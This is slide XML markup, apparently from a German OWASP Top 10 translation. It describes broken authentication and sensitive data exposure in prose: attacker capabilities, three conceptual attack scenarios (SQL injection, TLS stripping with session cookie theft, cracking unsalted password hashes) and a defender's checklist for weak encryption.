                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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baseline="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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rgbClr val="FEFFFF"/>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100" b="1">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de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angreifer haben Zugriff auf Millionen gültiger Benutzerdatensätze um diese als Prüfgrundlage zu nutzen, Listen mit administrativen Standard-zugängen, Werkzeuge zum Durchführen von </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bruteforce</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- und Wörterbuch-Angriffen. Angriffe auf die Authentifizierung sind gut erforscht, insbesondere in Bezug auf nicht erloschene Session-Token.</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de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Aufgrund des Designs und der Implementierung von Identitäts- und Zugriffsprüfungen sind Fehler in der Authentifizierung weit verbreitet. Sitzungsverwaltung („Session Management“) ist die Grundlage zur Prüf-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> von Authentisierung und Zugriffsberechtigung und in zustandsbehafteten Anwendungen vorhanden.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angreifer können fehlerhafte Authentifizierung mit manuellen Methoden erkennen und mithilfe automatisierter Tools mit Passwortlisten und Wörterbuchangriffen ausnutzen.</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de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Um ein System zu kompromittieren, genügt es einem Angreifer, nur wenige Zugänge oder den einen administrativen Zugang zu erlangen. Abhängig vom Zweck der Anwendung ermöglicht ihm das z. B. Geldwäsche, Sozialbetrug, Identitätsdiebstahl oder die Veröffentlichung hochsensibler Informationen.</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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mögliche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angriffsszenarien</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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eine Anwendung verschlüsselt Kreditkartendaten automatisch bei der Speicherung in einer Datenbank. Das bedeutet aber auch, dass durch SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> erlangte Kredit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kartendaten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in diesem Fall automatisch entschlüsselt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eine Webseite benutzt kein TLS, erzwingt dies nicht auf allen Seiten oder lässt schwache Verschlüsselung zu. Der Angreifer liest die Kommunikation mit (z.B. in einem offenen WLAN), ersetzt HTTPS- durch HTTP-Verbindungen, hört diese ab und stiehlt das Sitzungscookie. Durch Wiedereinspielen dieses Cookies übernimmt der Angreifer die (authentifizierte) Sitzung des Nutzers und erlangt Zugriff auf dessen private Daten. Anstatt dessen kann der Angreifer auch die übertragenen Daten ändern, z.B. den Empfänger einer Überweisung.</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Passwortdatenbank benutzt einfache Hashwerte oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ohne Salt zur Speicherung der Passwörter. Eine Schwachstelle in der Downloadfunktion erlaubt dem Angreifer den Zugriff auf die Passwortdatei. Zu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ohne Salt kann über vorausberechnete Rainbow-Tabellen der Klartext gefunden werden. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, die über einfache oder schnelle Funktionen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-rechnet wurden, können mittels Grafikkarte gebrochen werden.</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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zunächst müssen Sie den Schutzbedarf der übertragenen und der gespeicherten Daten bestimmen. Beispielsweise benötigen Passwörter, Kreditkartendaten, Patientendaten, Personaldaten und Geschäftsgeheimnisse einen erhöhten Schutz, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>insbeson-dere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> wenn dies in Datenschutzgesetzen, wie z.B. der Daten-schutz-Grundverordnung (DSGVO) der EU oder regulatorisch, wie z.B. im Finanzwesen dem PCI Data Security Standard </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(PCI DSS), gefordert wird. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Folgendes ist zu klären:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Werden Daten in Klartext übertragen? Dies betrifft insbesondere Protokolle wie z.B. HTTP, SMTP oder FTP. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Das Internet ist hier besonders gefährlich. Überprüfen Sie </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>auch interne Übertragungen, z.B. zwischen Load-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Balancern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Web-Servern und Backend-Systemen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Werden sensible Daten im Klartext gespeichert, inkl. Backups?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Werden veraltete oder schwache Kryptoverfahren genutzt,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>z.B. per Default-Einstellung oder veraltetem Code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Werden vordefinierte, schwache oder alte Schlüssel zur Verschlüsselung benutzt oder gibt es kein ordnungsgemäßes Schlüsselmanagement inkl. Schlüsselwechsel?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Wird die Verschlüsselung nicht verbindlich erzwungen, z.B. fehlen Vorgaben für den Browser z.B. im HTTP-Header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Prüft der Client (z.B. APP, Mail-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) Serverzertifikate richtig? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vgl. auch ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
